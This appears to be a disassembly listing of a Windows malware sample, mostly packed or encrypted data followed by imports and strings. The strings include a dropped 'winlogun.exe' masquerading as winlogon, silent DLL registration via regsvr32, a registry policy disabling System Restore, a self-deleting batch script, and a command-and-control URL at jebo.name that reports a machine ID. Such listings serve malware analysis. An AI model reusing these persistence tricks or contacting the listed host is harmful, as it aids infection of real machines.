dd 29599DEEh, 0E56DD063h, 1B5331B7h, 0EB0B28A6h, 0D78003A0h
dd 626D210Ch, 0B007BE21h, 92ED500Fh, 0E7E99397h, 2B67AF4Fh
dd 58BB67DBh, 26CD1623h, 1E9AF3C0h, 3FB60FC8h, 87266AC9h
dd 0A2C4D0A3h, 0FAB23F83h, 0CEA1232Eh, 3E16BC7Ch, 0EBC87B6Ch
dd 8B4B768Bh, 73A54E9Dh, 0D07EC7D3h, 0FF58C3A4h, 0E2C013ECh
dd 0C2184859h, 28393DD9h, 62CA1DC5h, 4F2A6730h, 20806274h
dd 42C39F25h, 303CBBE0h, 94D57546h, 0CFFCBD00h, 573ED059h
dd 0D952F447h, 402E3B06h, 462B43C9h, 0DEE6DC2Fh, 0F402C1B2h
dd 0B775474Dh, 0D54DF4E6h, 4680C5C7h, 10FDDC2Eh, 21FBC23Ch
dd 6DD57FD2h, 0E7CF5CA3h, 9F45784Fh, 7D096E7Bh, 0CADB8644h
dd 0DC827E03h, 0D3683842h, 2C8AD80Fh, 4423BCF3h, 0BB2EA455h
dd 7CA7C200h, 0C5A47677h, 0A8029088h, 516E58Dh, 0B896448Bh
dd 0C2ACA619h, 1035FCEDh, 9B9C9CB1h, 0A1D78866h, 0F7B310C1h
dd 9DDA492Fh, 57A4044Fh, 75E0776Fh, 576EB42Dh, 0EFE6B28Ah
dd 0D0D4C07Bh, 0F0B8622Ch, 5DADB33Fh, 0A0EE6003h, 1FF80CAEh
dd 7CBDC9DAh, 0DC49E35Ah, 0DAEFB51Fh, 8FCEF93Dh, 0F5E8CB10h
dd 3D08A37Ch, 88F82DF5h, 0F60B2568h, 225AB9EDh, 9DBCE1CCh
dd 0AC914C5h, 3574464h, 1F187B11h, 661AA981h, 9FFD3108h
dd 1A4518E9h, 6A86F6F4h, 0ADC5DD62h, 5ABF5866h, 6765D21Eh
dd 2A13821Ah, 0ED3056E0h, 72875FEh, 204CCAB2h, 0A3333EEDh
dd 37B45891h, 0FDC05C02h, 0A89F0E24h, 645CB8B8h, 6AE04AEDh
dd 8F718950h, 4870F0D8h, 49784A5Ch, 32AF498Ch, 0DB58A44Ah
dd 3712B715h, 19E9312Eh, 0CA133CEFh, 51E935FBh, 0A991432Dh
dd 0BEB9A2Ch, 5ABD4050h, 0BBC5B1D4h, 40897918h, 0BCAB16D8h
dd 251B23Ah, 0B33BC40h, 85ABF436h, 7D9310ABh, 95B6B3Dh
dd 0B897980Ch, 9C90C546h, 0A8E4AB4Bh, 8CD0647Ah, 6402F45h
dd 5A7EF20Bh, 92CF9300h, 0FB0521E1h, 927E6A03h, 97F16A0Dh
dd 0B8876D8Dh, 2F09729Ch, 0C4B87CC8h, 6D4D9E01h, 2977CAC7h
dd 8FBDA597h, 123E3C36h, 0AC945FF3h, 839E5709h, 35EB636Eh
dd 0A0EC3F1Bh, 0E8C00C8Ch, 0C929CFE4h, 0B48A9438h, 704C9175h
dd 0A707BFCEh, 0AB2466DDh, 0E7688DAFh, 0B4D6F081h, 0FEC21EE8h
dd 0CD34F3B1h, 2936FC86h, 38E604DBh, 6178C78Ah, 64AFBCB5h
dd 4C565167h, 16D8A54Fh, 0BABAC35Ah, 2701DA63h, 0E14A9D74h
dd 204BC70Eh, 7ED07EC1h, 18BA921Bh, 50C3F678h, 0C871B001h
dd 95E60CEBh, 93663D0Fh, 0DE3DE986h, 6D196FEh, 4A49AA5Ah
dd 65E06974h, 0CBD1AA0Fh, 0F719E7EDh, 0A2F54A15h, 0CAD6BEE0h
dd 0A9BA885Fh, 90EE972Bh, 6E3DF41Bh, 80B65D9Dh, 218DD281h
dd 19A8DADDh, 5BDBF2Dh, 0A48A7411h, 0A2FC37Ah, 90A4F5E2h
dd 3ABF79E5h, 1BC11958h, 161A0A6Bh, 26924228h, 0CC97C332h
dd 3C190A7Ah, 69D45D07h, 0C1701880h, 0E24560E8h, 9EAC7E25h
dd 0F0992CC5h, 445A8535h, 0A4CFF946h, 0CBC31B22h, 3D192930h
dd 0F825F22Ah, 268F6B7Eh, 799D3B1Ah, 8696202Fh, 5C393B8Ah
dd 7FE22AB2h, 67F53A8Eh, 843B4687h, 0E4D68F4Bh, 0A24E71A9h
dd 0B5755F71h, 0EB20F802h, 7072B866h, 0DD7308EDh, 825DFD68h
dd 0ADBB0016h, 5A89366Eh, 134F63DFh, 87454F38h, 33213FAh
dd 9744B61Ch, 0F5FA1B32h, 0BA521B44h, 81FA9B59h, 0EB8A1A29h
dd 644234B4h, 0D1C96809h, 0DA032CAAh, 0FB41AAB5h, 0B2C217C7h
dd 49D17D2h, 3C84A4B9h, 54CA29D7h, 7BFF1B44h, 35CC4E9h
dd 1EF44DD0h, 412ECCC1h, 0A6ABCE78h, 2074A809h, 1A602D5Eh
dd 0D2CE962Bh, 30AF52B6h, 261137F2h, 1F8C012h, 6CAE5848h
dd 14EE551h, 66C6E32Dh, 91438207h, 0F2CBFB01h, 0EC148AB9h
dd 0EB561B26h, 0E245F693h, 6002E289h, 0ABD3B10Dh, 1732B8A4h
dd 910E557h, 964EC6ADh, 43984264h, 7BCAFE5Ah, 0FC6402D8h
dd 5FD2643Dh, 65B7617Ah, 8DD45DBEh, 0C0F771E8h, 3AE3748Dh
dd 0A5AA41D9h, 0C5A53B20h, 7FD85E1Ch, 8313724Fh, 0A3E9606Ch
dd 72E1E38Fh, 2969AC6h, 15D6802Ah, 0E9C9564Ch, 0D7AED1A4h
dd 1B5FDEF0h, 66651942h, 0D6E42EC4h, 91FEB940h, 3A148640h
dd 0A08FBEF4h, 0C6719232h, 0A13A8A9Eh, 5F874922h, 412969E4h
dd 0F94A2733h, 0E598F4A1h, 5D938881h, 97CE3FFFh, 5CFFD1D6h
dd 0D3F056F2h, 6223280Eh, 92A46A64h, 6E6AB1D0h, 0BC56CFADh
dd 0FCE3AD7Eh, 432F6F90h, 9861C050h, 0F6CF292Ch, 147DBA6Eh
dd 7EF6C721h, 0F1BF8B8h, 8627858Ch, 0EEEFC1F8h, 0A7000887h
dd 12ACF841h, 0E83FAFACh, 7F975887h, 591B24E3h, 2E070036h
dd 55627F25h, 889C0368h, 0BC5C2295h, 0D2F6413Dh, 0CF496BDh
dd 0A64451CFh, 33D32762h, 535D2A75h, 7D8FECA7h, 0C77BE36Bh
dd 3F001627h, 5F50CF7Fh, 977ECD1Dh, 0B30152ADh, 0E3215Ah
dd 173AA242h, 12461B37h, 0FAC55636h, 9C1B0C54h, 6B9553Bh
dd 0EAD61DD4h, 4AE3F625h, 5C8A4A2Ah, 8CBCDBA3h, 0AD1F1FD2h
dd 0CB950F38h, 3D77F0C4h, 8D3420D1h, 0FF760150h, 9BCBC16Ah
dd 0F6629581h, 95357201h, 0B8587A0Eh, 79820487h, 799ECCCFh
dd 7F739FA4h, 1D5E07BEh, 29983EFEh, 338B5303h, 0FA7B458h
dd 0FF23EAC7h, 204CF58Dh, 0B72140Fh, 4BADB500h, 0A9C50BF2h
dd 0DD96D154h, 949974F9h, 58E37F9Ch, 0A2E60E70h, 0F636C2DFh
dd 32C9645Eh, 0E586AD42h, 8B7ACB91h, 0B12AC11Dh, 3E76DA28h
dd 0C84F8B67h, 215ABEC2h, 3801B4FEh, 8592227Eh, 0A8D3282Fh
dd 0B8DE93BEh, 4905E0EAh, 0D4EFAF1Ch, 3635AA4Fh, 1B4B7C4Fh
dd 64E352Ah, 368804DDh, 0FFFDE3C9h, 7BE2FE26h, 0AD972409h
dd 0B50839EAh, 4BED9BC8h, 0BD7BD607h, 93183A7Dh, 15EE80EDh
dd 0C6542531h, 1550D74Bh, 0D9BAB855h, 0ADDE0FF8h, 5D39CB6h
dd 804041C2h, 72385A70h, 0C320F2B0h, 652548F2h, 0B5666E48h
dd 21315B36h, 0F0A137DDh, 9FC46330h, 0EDE3AFBAh, 769A7FAh
dd 0D6F0FA9Eh, 0DBF354C6h, 6CCE22EAh, 0C6C0268Eh, 5406454h
dd 8EBCE6BAh, 2508C08Fh, 0A5323E80h, 0E8C451E7h, 946EA19Ch
dd 4C436076h, 6A34A2FDh, 370EAF1Fh, 0CA38C682h, 636904FCh
dd 0B515BFD7h, 0D3190ED9h, 0A6FF1FD9h, 3E74E7A7h, 0AFA48704h
dd 31B81D12h, 0BACF3931h, 68BA1610h, 46C488E6h, 93EC7578h
dd 400123A1h, 0E081D914h, 14B4B987h, 1784622Fh, 9C008DD8h
dd 0FFBE1213h, 0DB29FEA8h, 5013C036h, 0BF7AC891h, 8E226E69h
dd 3A64521Bh, 0A664920Eh, 7F59EE2Ah, 74A7640Dh, 0F5996D12h
dd 2CC93ACEh, 85BD452Dh, 5DD3C80Dh, 0BC494BC2h, 0E6349410h
dd 13A6EEBBh, 9C51B9D5h, 56B13C75h, 2557CF9h, 0DD3E6E1Eh
dd 53A18E66h, 0C8945347h, 1DBD6AF7h, 0CC5BB1E4h, 35E19F5Ah
dd 72FC8729h, 3663964Fh, 0A0CDF2BBh, 3494606Eh, 1F9BA3B8h
dd 9B5CA719h, 1BF5BD5Fh, 5CFA43A9h, 425E534Eh, 77EFC7C5h
dd 1BED7CD7h, 53E0CBB2h, 0A018FBCFh, 6B492490h, 242208Eh
dd 0B258E6E5h, 43C9885Ch, 828B7EDh, 8C4805F2h, 9D010555h
dd 431769DCh, 1F7398AEh, 0E4CFB4BCh, 4247B82Bh, 0B89997CCh
dd 0E3278018h, 7C5BC0EBh, 0E865E294h, 2555C9C2h, 22D71B61h
dd 82CEB354h, 0C2A5648Ch
dd 0A2BDA771h, 0A0336875h, 2CE5EF93h, 3913C93Ch, 0C183A17Bh
dd 0CB575D94h, 307B91E9h, 1E038D36h, 22CF8E17h, 0DF071F6Dh
dd 7C37E2h, 0CA0D5F23h, 9B2B1B5Fh, 397157ABh, 0BABD6985h
dd 0E02EF1FFh, 0F26941B2h, 970EB684h, 470511D0h, 0BA9DEA33h
dd 0BB76CD3Dh, 2FCDC3D3h, 0A0B59D07h, 4A78A8C7h, 0BA4CCFABh
dd 3086F601h, 4D4B1CBEh, 0AF3F70D7h, 7A403C12h, 385FE096h
dd 0CDBD6520h, 0F0A8E928h, 4DD3381Ch, 0E426BA11h, 42CB13EBh
dd 0B7071E7Ch, 68C2AFB0h, 9E0BAF53h, 0E8C98007h, 244445D7h
dd 0A08BAEEAh, 0E36401C2h, 66C88579h, 10A97C06h, 77E90910h
dd 0B0E0EBC7h, 0B6F42442h, 8DD36DE1h, 3C060F54h, 4D90F5CFh
dd 0CB03550Ah, 6462660Ah, 0A0F8F7B5h, 0C26F3303h, 33914962h
dd 244B3210h, 76755013h, 0E2E8D4D1h, 0B0F73624h, 90BD80BDh
dd 936FA1C8h, 5DC2D2BEh, 0C47CC299h, 9D4D6AC2h, 8F4038FBh
dd 0F518D74Bh, 4F01662Dh, 0A98B26A8h, 5628CB14h, 5527EBB8h
dd 89CF47B4h, 0BD8038Fh, 312121C7h, 0DE663873h, 65B4AE46h
dd 5309354Fh, 33D5DE02h, 5AAFC85Eh, 95AA86C5h, 0B4719F43h
dd 59DBED89h, 0E76117D6h, 7BE58F59h, 0FAF0CBA8h, 88DE01CDh
dd 3FD35A5Bh, 717B848Ch, 15021C70h, 0D3A52E13h, 92A88424h
dd 5DAF297h, 0CBE90927h, 5095E105h, 530D3D53h, 8E993DDCh
dd 3EDEF350h, 0D4C17279h, 44E10178h, 7F2B677Ah, 2AB1B251h
dd 0F1DACF8Eh, 1358214Ah, 0A1AFD0F8h, 8A1F2769h, 19313145h
dd 0F618F5AAh, 0C598BA4Ch, 3C5534C9h, 212CEB45h, 550B7748h
dd 7EA8EC9Bh, 0DA3849ABh, 0D0F312CAh, 0C3A705D4h, 17C7EEA1h
dd 91654E18h, 0A1C7EA7Ch, 38DEB38h, 8584F3E7h, 77E14A89h
dd 9E86C898h, 0BAAA6262h, 3216F139h, 214BAE07h, 5D85C1Fh
dd 4255F624h, 1B5F053Ch, 0F95C2086h, 5EE66F3Fh, 0F1B33161h
dd 0D25FBDDEh, 0EEA8990Bh, 2CC1F022h, 93FC3DDEh, 48A0ED7Eh
dd 1CDB922Bh, 11C5CE87h, 611DAEE9h, 0B1EB39A5h, 22E7405Fh
dd 277C5B06h, 30725002h, 0C931B0A6h, 0B642883Ch, 0C7590DD2h
dd 28F9407Dh, 0E4987D74h, 0FC5082BCh, 7D0271C0h, 8C79F6ADh
dd 214F8FB9h, 0B0DA444Eh, 0ADD3CAD2h, 0B89AC65Ch, 0BAB06435h
dd 2E223F55h, 9EA58432h, 0D4CB28E6h, 71079DC2h, 5911503Ah
dd 0A1FA99Dh, 0EF827998h, 0D060C318h, 66736662h, 3BFAFA4Eh
dd 1AAAAF6Eh, 0CCB4E571h, 3EB0275h, 34A15AF0h, 244964F6h
dd 0A808D391h, 292B423Eh, 82E3C436h, 0B6B7E944h, 0DF52A138h
dd 6BBAB711h, 69F58EC3h, 5B0233B7h, 55A0BFE3h, 78514D84h
dd 0A1F74EEAh, 5CCADD3Ah, 82772986h, 6F4EA7BCh, 3F6202D0h
dd 3E91F56Fh, 0C07994D8h, 2E1770B8h, 0CF050363h, 0CE179E51h
dd 303F69F8h, 0E3A991E8h, 0F24EF0C6h, 0F96D8194h, 0AEF7D772h
dd 4838A1FAh, 93F7DBBh, 0DDD8EB40h, 71085E24h, 0B8C2701Ah
dd 1516A85Dh, 961B1571h, 0AD3CC732h, 62A40D91h, 280E8E4Dh
dd 5C3AF999h, 340A458Eh, 632BCA82h, 0FA1B19F2h, 0B3B27C55h
dd 5F5F5F97h, 0CB52CD4Ch, 0AB926A47h, 5B494FCCh, 97E50883h
dd 0F9118ED4h, 8307BF00h, 3AA69E85h, 4F56B0h, 119AA8A3h
dd 0EAD3732Eh, 32C7348h, 0F76376BBh, 7F35702Ah, 9BE5D7D4h
dd 3BD55EBDh, 863C1801h, 2DF0F527h, 0FBE4FC8Bh, 0C979B56h
dd 86E71995h, 0B8C3EF6Fh, 460E95C7h, 8227837Fh, 8FBABBD1h
dd 0EA9232Eh, 9AD68B8Bh, 0B6900FF1h, 0F86B08BBh, 5B6CC702h
dd 68006FF8h, 8111E2C4h, 49526BA6h, 0BE1E7064h, 29C0BEE2h
dd 1BEE6F9Ah, 17B98BDDh, 7AF28F4Ah, 0FA36497Eh, 2F37AF5Ah
dd 0B61383B8h, 9E752DCAh, 215480BCh, 9F4568C1h, 4CED2582h
dd 546A0D07h, 0D72BCB9h, 0E383264Eh, 0EE451BD1h, 8C47AB96h
dd 195B7FEAh, 4B6F452Ah, 0A22F73DDh, 39D2A69Ch, 7C4811F0h
dd 0E6CF927Ch, 92CD6323h, 410569E6h, 2494D6F7h, 3E6FF0A4h
dd 2B6DC1F3h, 0F2F52FC7h, 0C4D9EDF1h, 0F10CA7A2h, 44DFD4CBh
dd 0A298A737h, 15993C31h, 2BB9192Eh, 0BE592113h, 84D4D2E3h
dd 0AFDF88E1h, 0F3D5EF08h, 1F7B36E5h, 12B432Ch, 3EBF5A45h
dd 75A12CEEh, 7B59C198h, 0C66BBBDCh, 3A16612Ah, 1EA152AFh
dd 0C00551B4h, 4BC324FEh, 36498D76h, 0E4F573C5h, 0B3E2975Ch
dd 0A5C48A59h, 2F7AB0F2h, 524C2B97h, 47C67C54h, 0C81E7483h
dd 7C67E4FDh, 0BCB99127h, 213E047Ch, 32E445D1h, 172D10B1h
dd 0D5DCDFF7h, 4A4ABF02h, 0ED2DC914h, 0CE0E3CC8h, 3F606645h
dd 2CE1B3EEh, 3AB9D695h, 0F5ADE983h, 0F5C04577h, 0CF10CA74h
dd 0E48DB767h, 17E478EDh, 0A2D6D177h, 0C880746Bh, 9F53A640h
dd 0DCD667CEh, 768E49FBh, 5DCA7F05h, 7C7B6911h, 606D4F97h
dd 5E81FF5Dh, 163371FDh, 684031ADh, 5D5FE945h, 9E93D6F6h
dd 8A836542h, 2968A7E9h, 50DD2DFDh, 9E8F4C43h, 554B4B15h
dd 60C315D7h, 0AC0AB816h, 81C4720Bh, 0BBF8BAD3h, 0CBD43DB7h
dd 45A3C9C2h, 49B790FAh, 5A59CBB2h, 268D1BC7h, 8BCC56Fh
dd 26C8C520h, 9C387B14h, 0C3DC5A31h, 81ABAF72h, 7291729Bh
dd 0F2995D98h, 22F29CF6h, 7C9A6A3Ah, 9C5D4F3Bh, 20D47386h
dd 2A4EE7EEh, 2C34B7A4h, 4C9BE9A4h, 7CF2BF48h, 56C5FBFFh
dd 319A92F9h, 0B53E3168h, 7331A6BCh, 59AB3BB4h, 93A4C2ACh
dd 904BAD2Bh, 0D75CEA59h, 8FABE997h, 368540C6h, 379718C8h
dd 0C325DD94h, 0A17FE831h, 2B0D0C12h, 63FD700Bh, 0A87B4DF7h
dd 0C5C8D30h, 38DB403Bh, 0E22B00DDh, 3948E690h, 72CB5B3Dh
dd 0DB9060BCh, 3CD27F9Fh, 0BFE6B459h, 1281AC01h, 201AE373h
dd 505DB11Fh, 6CCB7C43h, 5E831E6Bh, 4DC821BEh, 0A5EFA92Ch
dd 3C382A0Fh, 22972EE6h, 8EEE143Bh, 0D4325391h, 0C39CB6B7h
dd 486772Ch, 0C0F7DF0Ah, 0F9F28E90h, 34CB98B7h, 263E1FC4h
dd 29980B71h, 0C5C06CB4h, 0D04C964Eh, 85C2BA5Fh, 465808D1h
dd 73AF1D9Bh, 9EF8A4DDh, 6E7631C8h, 0FE519B4Eh, 0A3C4995Eh
dd 1FA1DF32h, 717DEC65h, 45DC403Bh, 0DE6AF31Bh, 8AE3EE87h
dd 0BC1547BDh, 40AF9BE3h, 0F7DD9AA5h, 643B9FAh, 0F85865CFh
dd 0F23D6434h, 4C589C8Ch, 688B83F4h, 0EC12778Eh, 294AB391h
dd 0AC55F5DAh, 11946E71h, 0A65B3222h, 0B9211F79h, 1BA85761h
dd 73h dup(0)
dd 3138h, 3064h, 3 dup(0)
dd 329Ah, 30ACh, 3 dup(0)
dd 3338h, 30CCh, 3 dup(0)
dd 33D6h, 30F4h, 5 dup(0)
dd 3146h, 3164h, 3178h, 3188h, 319Ah, 31B8h, 31C0h, 31D6h
dd 31EAh, 31FAh, 320Ch, 3226h, 3240h, 324Eh, 325Ch, 3270h
dd 3288h, 0
dd 32A6h, 32BAh, 32C8h, 32DEh, 32F4h, 330Ah, 3322h, 0
dd 3342h, 3358h, 3364h, 337Ah, 338Ah, 339Ah, 33ACh, 33B8h
dd 33C2h, 0
dd 33E4h, 33F8h, 3410h, 342Eh, 343Eh, 3454h, 3464h, 347Ah
dd 348Ch, 34A8h, 34C6h, 34DCh, 34EEh, 3500h, 3510h, 3520h
dd 0
aKernel32_dll db 'KERNEL32.DLL',0
align 4
aScrollconsoles db 'ScrollConsoleScreenBufferA',0
align 10h
dd 73490000h, 75626544h, 72656767h, 73657250h, 746E65h
dd 68540000h, 64616572h, 654E3233h, 7478h, 69560000h, 61757472h
dd 6F72506Ch, 74636574h, 0
aGetconsolescre db 'GetConsoleScreenBufferInfo',0
align 4
dd 6C530000h, 706565h, 6E490000h, 6C726574h, 656B636Fh
dd 63784564h, 676E6168h, 65h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 0
aGetconsolecp db 'GetConsoleCP',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
dd 65530000h, 766E4574h, 6E6F7269h, 746E656Dh, 69726156h
dd 656C6261h, 41h, 6E65704Fh, 666F7250h, 55656C69h, 4D726573h
dd 69707061h, 676Eh, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aExitprocess db 'ExitProcess',0
dd 65530000h, 6E6F4374h, 656C6F73h, 6C746954h, 5765h, 72570000h
dd 50657469h, 69666F72h, 6553656Ch, 6F697463h, 576Eh, 65470000h
dd 6D6F4374h, 646E616Dh, 656E694Ch, 53550041h, 32335245h
dd 4C4C442Eh, 0
aGetsystemmetri db 'GetSystemMetrics',0
align 4
aEditwndproc db 'EditWndProc',0
dd 65470000h, 73614C74h, 74634174h, 50657669h, 7075706Fh
dd 0
aSetmenuitembit db 'SetMenuItemBitmaps',0
align 10h
dd 65530000h, 654D646Eh, 67617373h, 6D695465h, 74756F65h
dd 57h, 61727241h, 4965676Eh, 696E6F63h, 6E695763h, 73776F64h
dd 0
aEnumwindowstat db 'EnumWindowStationsW',0
aGdi32_dll db 'GDI32.DLL',0
align 10h
aGettextextentp db 'GetTextExtentPointA',0
dd 65530000h, 4D6B4274h, 65646Fh, 64670000h, 616C5069h
dd 6F705379h, 74536C6Fh, 6D616572h, 0
aSetbitmapbits db 'SetBitmapBits',0
align 4
aSettextalign_0 db 'SetTextAlign',0
align 4
aGeticmprofilew db 'GetICMProfileW',0
align 4
dd 72430000h, 65746165h, 574344h, 69460000h, 67526C6Ch
dd 6Eh, 56746547h, 70776569h, 4574726Fh, 78457478h, 44410000h
dd 49504156h, 442E3233h, 4C4Ch, 72430000h, 53747079h, 72507465h
dd 6469766Fh, 577265h, 72430000h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 4174h, 65530000h, 63655374h, 74697275h
dd 73654479h, 70697263h, 4F726F74h, 72656E77h, 0
aCryptdecrypt_0 db 'CryptDecrypt',0
align 4
aGetsidsubautho db 'GetSidSubAuthority',0
align 10h
dd 73490000h, 74786554h, 63696E55h, 65646Fh, 75510000h
dd 53797265h, 69767265h, 74536563h, 73757461h, 0
aGettrusteename db 'GetTrusteeNameW',0
dd 6C410000h, 61636F6Ch, 6E416574h, 696E4964h, 6C616974h
dd 53657A69h, 6469h, 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h
dd 73694465h, 79616C70h, 656D614Eh, 57h, 53746547h, 69767265h
dd 654B6563h, 6D614E79h, 4165h, 72430000h, 44747079h, 76697265h
dd 79654B65h, 0
aCryptcreatehas db 'CryptCreateHash',0
db 0
align 2
aCrypthashdat_0 db 'CryptHashData',0
db 0
align 2
aRegenumkeyexa db 'RegEnumKeyExA',0
db 0
align 2
aLockservicedat db 'LockServiceDatabase',0
align 4
dd 558h dup(0)
aRegsvr32_exeSS db 'Regsvr32.exe /s %s',0 ; DATA XREF: start+6F�o
aHsjefi8wunkmdf db '\hsjefi8wunkmdf.dll',0 ; DATA XREF: start+16�o
aSoftwarePolici db 'SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore',0
; DATA XREF: sub_40150E+17�o
aDisableConfig db 'Disable Config',0 ; DATA XREF: sub_40150E+3B�o
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: start+112�o
aHttpJebo_nameC db 'http://jebo.name/cd/un2.php?id=%s&ver=vp0',0 ; DATA XREF: start+106�o
aP2hhr_bat db 'p2hhr.bat',0 ; DATA XREF: sub_401127+43�o
aLsh2Del1IfExis db ':lsh2',0Dh,0Ah ; DATA XREF: sub_401127+73�o
; sub_401127+86�o
db 'del %1',0Dh,0Ah
db 'if exist %1 goto lsh2',0Dh,0Ah
db 'del %0',0
aOpen db 'open',0 ; DATA XREF: sub_401127+D0�o
db '\',0
aWinid db 'WINID',0 ; DATA XREF: sub_401565+44�o
; sub_401565+8D�o
aError db 'ERROR',0 ; DATA XREF: sub_401565+B7�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0
; DATA XREF: sub_401565+1D�o
aLxLx db '%lX%lX',0 ; DATA XREF: sub_401565+67�o
aLu_exe db '%lu.exe',0 ; DATA XREF: sub_4012DD+1F�o
; sub_4012DD+69�o
aWinlogun_exe db 'winlogun.exe',0 ; DATA XREF: start+A6�o
byte_40A66F db 0 ; DATA XREF: sub_4012DD+16C�o
; sub_4012DD+17C�r ...
dd 3070400h, 801h
dword_40A678 dd 264h a1646169094_exe db '1646169094.exe',0 ; DATA XREF: sub_4012DD+24�o
; sub_4012DD+42�o ...
align 4
dd 3Bh dup(0)
db 3 dup(0)
aCDocume1Cybert db 'C:\DOCUME~1\cyberta\LOCALS~1\Temp\winlogun.exe',0 ; DATA XREF: start+C�o
; start+1B�o ...
align 4
dd 1FEh dup(0)
db 0
aA db '',0 ; DATA XREF: sub_40150E+5�o
; sub_40150E+40�r ...
align 4
db 0
dword_40AFA9 dd 3A98h align 10h
dd 3 dup(0)
db 0
aCM_unpackerP_0 db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_401127+1C�o
; sub_401127:loc_4011D1�o
align 4
dd 79h dup(0)
db 0
aCM_unpackerP2h db 'C:\m_unpacker\p2hhr.bat',0 ; DATA XREF: sub_401127+B�o
; sub_401127+17�o ...
align 4
dd 79h dup(0)
db 0
aCM_unpackerPac db '"C:\m_unpacker\packed.exe"',0 ; DATA XREF: start+74�o
; start+83�o ...
aSystem32Hsjefi db 'system32\hsjefi8wunkmdf.dll',0
dd 72h dup(0)
db 0
a1c97ae360a5d87 db '1C97AE360A5D87A',0 ; DATA XREF: sub_4012DD+A2�o
; sub_401565+3B�o ...
align 10h
dd 3Bh dup(0)
db 0
aHttpJebo_nam_0 db 'http://jebo.name/cd/un2.php?id=1C97AE360A5D87A&ver=vp0',0
; DATA XREF: sub_4012DD+AA�o
; sub_4012DD+C2�o
dd 3F2h dup(0)
db 3 dup(0)
byte_40C6BF db 0 ; DATA XREF: sub_40120B+11�o
; sub_40120B+74�o
align 1000h
_rdata ends
; Section 3. (virtual address 0000D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40D000h
align 2000h
_idata2 ends
end start